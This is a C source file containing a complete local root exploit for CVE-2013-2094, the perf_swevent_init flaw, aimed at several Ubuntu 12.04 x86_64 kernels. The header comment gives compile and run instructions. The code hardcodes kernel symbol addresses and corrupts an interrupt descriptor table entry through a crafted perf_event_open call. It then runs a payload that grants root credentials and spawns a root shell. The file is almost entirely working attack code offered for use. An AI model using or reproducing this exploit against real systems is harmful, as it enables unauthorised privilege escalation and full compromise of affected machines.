CVE-2013-2094-Ubuntu-12.c

1. /**
2. * Ubuntu 12.04 3.x x86_64 perf_swevent_init Local root exploit
3. * by Vitaly Nikolenko (vnik5287@gmail.com)
4. *
5. * based on semtex.c by sd
6. *
7. * Supported targets:
8. * [0] Ubuntu 12.04.0 - 3.2.0-23-generic
9. * [1] Ubuntu 12.04.1 - 3.2.0-29-generic
10. * [2] Ubuntu 12.04.2 - 3.5.0-23-generic
11. *
12. * $ gcc vnik.c -O2 -o vnik
13. *
14. * $ uname -r
15. * 3.2.0-23-generic
16. *
17. * $ ./vnik 0
18. */
19.  
20. #define _GNU_SOURCE 1
21. #include <stdint.h>
22. #include <stdio.h>
23. #include <stdlib.h>
24. #include <string.h>
25. #include <unistd.h>
26. #include <sys/mman.h>
27. #include <syscall.h>
28. #include <stdint.h>
29. #include <assert.h>
30.  
31. #define BASE 0x1780000000
32. #define SIZE 0x0010000000
33. #define KSIZE 0x2000000
34. #define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))
35.  
36. typedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred);
37. typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred);
38.  
39. uint64_t targets[3][3] =
40. {{0xffffffff81ef67e0, // perf_swevent_enabled
41. 0xffffffff81091630, // commit_creds
42. 0xffffffff810918e0}, // prepare_kernel_cred
43. {0xffffffff81ef67a0,
44. 0xffffffff81091220,
45. 0xffffffff810914d0},
46. {0xffffffff81ef5940,
47. 0xffffffff8107ee30,
48. 0xffffffff8107f0c0}
49. };
50.  
51. void __attribute__((regparm(3))) payload() {
52. uint32_t *fixptr = (void*)AB(1);
53. // restore the handler
54. *fixptr = -1;
55. commit_creds_fn commit_creds = (commit_creds_fn)AB(2);
56. prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)AB(3);
57. commit_creds(prepare_kernel_cred((uint64_t)NULL));
58. }
59.  
60. void trigger(uint32_t off) {
61. uint64_t buf[10] = { 0x4800000001, off, 0, 0, 0, 0x300 };
62. int fd = syscall(298, buf, 0, -1, -1, 0);
63. assert( !close(fd) );
64. }
65.  
66. int main(int argc, char **argv) {
67. uint64_t off64, needle, kbase, *p;
68. uint8_t *code;
69. uint32_t int_n, j = 5, target = 1337;
70. int offset = 0;
71. void *map;
72.  
73. assert(argc == 2 && "target?");
74. assert( (target = atoi(argv[1])) < 3 );
75.  
76. struct {
77. uint16_t limit;
78. uint64_t addr;
79. } __attribute__((packed)) idt;
80.  
81. // mmap user-space block so we don't page fault
82. // on sw_perf_event_destroy
83. assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);
84. memset(map, 0, SIZE);
85.  
86. asm volatile("sidt %0" : "=m" (idt));
87. kbase = idt.addr & 0xff000000;
88. printf("IDT addr = 0x%lx\n", idt.addr);
89.  
90. assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);
91. memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &payload, 1024);
92. memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", 13);
93.  
94. // can only play with interrupts 3, 4 and 0x80
95. for (int_n = 3; int_n <= 0x80; int_n++) {
96. for (off64 = 0x00000000ffffffff; (int)off64 < 0; off64--) {
97. int off32 = off64;
98.  
99. if ((targets[target][0] + ((uint64_t)off32)*24) == (idt.addr + int_n*16 + 8)) {
100. offset = off32;
101. goto out;
102. }
103. }
104. if (int_n == 4) {
105. // shit, let's try 0x80 if the kernel is compiled with
106. // CONFIG_IA32_EMULATION
107. int_n = 0x80 - 1;
108. }
109. }
110. out:
111. assert(offset);
112. printf("Using int = %d with offset = %d\n", int_n, offset);
113.  
114. for (j = 0; j < 3; j++) {
115. needle = AB(j+1);
116. assert(p = memmem(code, 1024, &needle, 8));
117. *p = !j ? (idt.addr + int_n * 16 + 8) : targets[target][j];
118. }
119. trigger(offset);
120. switch (int_n) {
121. case 3:
122. asm volatile("int $0x03");
123. break;
124. case 4:
125. asm volatile("int $0x04");
126. break;
127. case 0x80:
128. asm volatile("int $0x80");
129. }
130.  
131. assert(!setuid(0));
132. return execl("/bin/bash", "-sh", NULL);
133. }